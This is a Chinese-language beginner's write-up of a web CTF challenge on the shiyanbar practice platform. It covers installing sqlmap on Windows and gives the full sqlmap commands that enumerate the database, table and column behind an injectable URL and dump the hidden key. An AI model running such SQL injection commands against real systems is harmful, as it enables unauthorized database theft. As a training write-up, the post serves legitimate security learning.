实验吧ctf题库：这个看起来有点简单！

       查看这道题先登陆“实验吧”，地址为 http://www.shiyanbar.com/ctf/33 。

       这是一道十分基础的web题目，因为我也是刚刚接触ctf，记录一下第一道题的解题过程，算是自己的一个回顾吧，同时也给一些想要入门的朋友一点点微弱的参考吧。

一、sqlmap的安装

       在windows下安装sqlmap需要先下载适用windows的sqlmap版本和python。

       sqlmap的下载地址为：https://github.com/sqlmapproject/sqlmap/tarball/master。

       python下载地址为：https://www.python.org/。我的python用的是2.7版本。

      安装好python后， 在python文件目录下新建一个sqlmap文件夹。sqlmap的压缩包解压后能得到下图文件夹，将里面的内容复制到新建的文件夹sqlmap下面。

                         

  

 

       在sqlmap目录下打开cmd，输入python  sqlmap.py --version 测试是否安装成功。

       

      如果结果为上图，说明安装成功。

二、使用sqlmap解题

      首先cmd到之前的sqlmap目录下，输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db 。引号内是存在注入点的网址。

      运行后，得到数据库名称 my_db

      

      然后查看一下表，输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables。

     

  发现有一个thiskey表，猜测需要的信息就藏在thiskey中，于是输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns。

      

      得到一个txt类型的k0y，然后再dump出来就完事了。

      输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

      

      得到k0y的值。